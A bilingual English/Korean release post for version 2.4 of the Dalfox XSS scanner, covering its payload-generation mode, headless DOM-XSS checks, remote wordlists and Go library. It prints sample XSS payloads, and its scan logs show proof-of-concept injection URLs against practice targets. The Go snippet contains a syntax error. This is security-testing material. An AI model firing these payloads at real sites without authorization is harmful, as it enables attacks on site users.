Dalfox 2.4 release! review with me!

Dalfox 2.4 features

Summary

  • Added payload mode
  • Added using remote assets
  • Added headless browser(only for domxss and inJS)
  • Support to scanning URL Fragments(hash)
  • Support library package (golang)
  • Update bav (added crlf detection)
  • Fixed many bugs!

Added mode

  • payload mode

Added flags

  • --deep-domxss
  • --skip-headless
  • --remote-wordlists
  • --remote-payloads

Payload mode

flags!

Usage:
  dalfox payload [flags]
Flags:
      --encoder-url            Encoding output [URL]
      --entity-event-handler   Enumerate a event handlers for xss
      --entity-gf              Enumerate a gf-patterns xss params
      --entity-special-chars   Enumerate a special chars for xss
      --entity-useful-tags     Enumerate a useful tags for xss
      --enum-attr              Enumerate a in-attr xss payloads
      --enum-common            Enumerate a common xss payloads
      --enum-html              Enumerate a in-html xss payloads
      --enum-injs              Enumerate a in-js xss payloads
  -h, --help                   help for payload
      --make-bulk              Make bulk payloads for stored xss
      --remote-payloadbox      Enumerate a payloadbox's xss payloads
      --remote-portswigger     Enumerate a portswigger xss cheatsheet payloads

mke-bulk

Make-bulk can create a customized bulk payload based on dalfox’s payload generation logic, or a payload of patterns such as sequences in which alert-value values increase sequentially. Based on this, it can be used in bulk tests, etc., where a large amount of XSS code is inserted during the Stored XSS test.

make-bulk는 dalfox의 페이로드 생성 로직을 기반으로 커스텀한 형태의 bulk 페이로드를 만들거나 alert-value 값이 순차적으로 증가하는 시퀀스 같은 패턴의 페이로드를 만들 수 있습니다. 이를 기반으로 Stored XSS 테스트 시 대량의 XSS 코드를 넣는 Bulk test 등에서 사용하실 수 있습니다.

dalfox payload --make-bulk
....
<input onbeforecopy=alert(72) value=\"XSS\" autofocus>
<textarea onbeforecopy=alert(73) autofocus>XSS<\/textarea>
<a onbeforecopy=\"alert(74)\" contenteditable>test<\/a>
<abbr onbeforecopy=\"alert(75)\" contenteditable>test<\/abbr>
<acronym onbeforecopy=\"alert(76)\" contenteditable>test<\/acronym>
// bulk는 alert 등의 popup value를 순차로 올려줘서 sxss 테스트 때 식별용으로 쓸 수 있어요
... snip ....

Enum payload and Entity

You can extract the payload pattern, or entity, used by dalfox. It can be reused as a wordlist in fuzzer, etc.

dalfox에서 사용하는 payload 패턴, 또는 entity를 뽑아낼 수 있습니다. 이는 fuzzer등에서 wordlist로 재 활용할 수 있습니다.

dalfox payload --entity-event-handler
[I] [Entity-Event-Handlers][Line: 147]
onabort
onactivate
onafterprint
onafterscriptexecute
onafterupdate
onanimationcancel
onanimationstart
onauxclick
... snip ...

Now, use headless browser in dalfox

From now on, dalfox partially uses the headless browser. Of course, it is minimally configured so that it does not affect the speed, and it is used to verify some inJS cases, which are dom-xss and javascript internal xss, to increase accuracy and detection rate. 😎

이제부터 dalfox는 부분적으로 headless 브라우저를 사용합니다. 물론 속도에 영향가지 않게 최소한으로 구성하였고, 일부 dom-xss와 javascript 내부 xss인 inJS 케이스들의 검증에 사용되어 정확도와 탐지율을 높였습니다.

Support a flag called ‘–deep-domxss’ for more in-depth dome-xss testing. This flag allows you to perform headless-based testing with more DOM XSS payloads than before. Of course, of course, it slows down a little.. 😭

조금 더 심층적인 dom-xss 테스트를 위해 --deep-domxss 라는 flag를 지원합니다. 이 flag를 사용하면 기존보다 더 많은 DOM XSS 페이로드를 가지고 headless 기반의 테스팅을 진행합니다. 물론 당연히 속도는 약간 떨어집니다.

Using remote assets

Now, Dalfox can testing with remote resources.

dalfox에서 이제 원격 리소스를 기반으로한 테스팅을 진행할 수 있습니다.

XSS Payload from online

dalfox url https://xss-game.appspot.com/level1/frame --remote-payloads=portswigger
[*] 🦊 Start scan [SID:Single] / URL: https://xss-game.appspot.com/level1/frame
[I] Found 2 testing point in DOM base parameter mining
[I] Found 1 testing point in Dictionary base paramter mining
...snip...
[I] A 'portswigger' payloads has been loaded [1488L / 93K]

Parameter mining from online

dalfox url https://xss-game.appspot.com/level1/frame --remote-wordlists=assetnote
[*] 🦊 Start scan [SID:Single] / URL: https://xss-game.appspot.com/level1/frame
[I] A 'assetnote' wordlist has been loaded [29993L / 275K]
[I] Found 2 testing point in DOM base parameter mining

In the Code

The interface is now implemented and provided for easy library use in Golang code.

이제 golang 코드에서 쉽게 라이브러리를 통해 사용할 수 있도록 인터페이스를 구현하여 제공합니다.

Get library of dalfox

▶ go get github.com/hahwul/dalfox/v2/lib

Using dalfox in the your golang code

package main
import (
	"fmt"
	dalfox "github.com/hahwul/dalfox/v2/lib"
)
func main() {
	opt := dalfox.Options{
		Cookie:     "ABCD=1234",
	}
	result, err := dalfox.NewScan(dalfox.Target{
		URL:     "https://xss-game.appspot.com/level1/frame",
		Method:  "GET",
		Options: opt,
	})
	if err != {
		fmt.Println(err)
	} else {
		fmt.Println(result)
	}
}

자세한 내용은 https://pkg.go.dev/github.com/hahwul/dalfox/v2/lib 을 참고해주세요.

More

BAV - CRLF

[*] 🦊 Start scan [SID:Single] / URL: http://localhost:8070/xss/abcd/2
[G] Found CRLF Injection via built-in grepping / original request
[POC][G][CRLF/GET] http://localhost:8070/xss/abcd/2
[I] Found 0 testing point in DOM base parameter mining
[I] Content-Type is text/html; charset=UTF-8is 🔍
[I] Reflected PATH '/xss/dalfoxpathtest/2' => Injected: /inJS-single(1)]
[V] Triggered XSS Payload (found dialog in headless)aiting headless
[POC][V][GET] http://localhost:8070/xss/abcd'-confirm(1)-'/2?=

https://github.com/hahwul/dalfox/issues/227

Scanning URL Fragments

dalfox url https://juice-shop.herokuapp.com/\#/search\?q\=aaa
......
[*] 🦊 Start scan [SID:Single] / URL: https://juice-shop.herokuapp.com/#/search?q=aaa
[I] Found 0 testing point in DOM base parameter mining
[I] Content-Type is text/html; charset=UTF-8is 🔍
[I] X-Frame-Options is SAMEORIGIN
[I] Access-Control-Allow-Origin is *
[V] Triggered XSS Payload (found dialog in headless)aram and waiting dom xss
[POC][V][GET] https://juice-shop.herokuapp.com/#/search?q=%3Csvg/OnLoad=%22%60$%7Bprompt%601%60%7D%60%22%3E

https://github.com/hahwul/dalfox/issues/240